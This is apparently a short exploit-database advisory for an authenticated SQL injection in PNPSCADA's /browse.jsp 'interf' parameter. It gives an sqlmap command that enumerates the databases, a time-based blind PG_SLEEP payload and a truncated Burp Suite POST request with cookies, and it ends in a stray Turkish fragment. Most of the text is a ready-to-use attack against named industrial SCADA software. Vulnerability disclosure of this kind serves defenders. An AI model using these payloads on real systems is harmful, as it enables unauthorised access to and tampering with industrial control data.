# Exploit Title: PNPSCADA 2.200816204020 - 'interf' SQL Injection (Authenticated)  
# Google Dork: -  
# Date: 2020-08-17  
# Exploit Author: İsmail ERKEK  
# Vendor Homepage:  
# Version: 2.200816204020  
# Tested on: -  
1. Description:  
PNPSCADA 2.200816204020 allows SQL Injection via parameter 'interf' in  
/browse.jsp. Exploiting this issue could allow an attacker to compromise  
the application, access or modify data, or exploit latent vulnerabilities  
in the underlying database.  
2. Proof of Concept:  
In Burpsuite intercept the request from one of the affected pages with  
'interf' parameter and save it like fuel.req Then run SQLmap to extract the  
data from the database:  
sqlmap -r req-pnp-browse.txt --risk=3 --level=5 --dbs --random-agent  
3. Example payload:  
(time-based blind)  
memh=803509994960085058&searchStr=&replaceId=k1&multiple=yes&interf=115 AND  
6380=(SELECT 6380 FROM PG_SLEEP(5))&page=1&mselect=98831  
4. Burpsuite request:  
POST /browse.jsp HTTP/1.1  
Accept-Encoding: gzip, deflate  
Accept: */*  
Accept-Language: en  
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64;  
Connection: close  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 93  
Cookie: wiki=; psl=7465737433; JSESSIONID=1ojrclvd94cpfebapnqebli37  
Best Regards.  
Ek alanı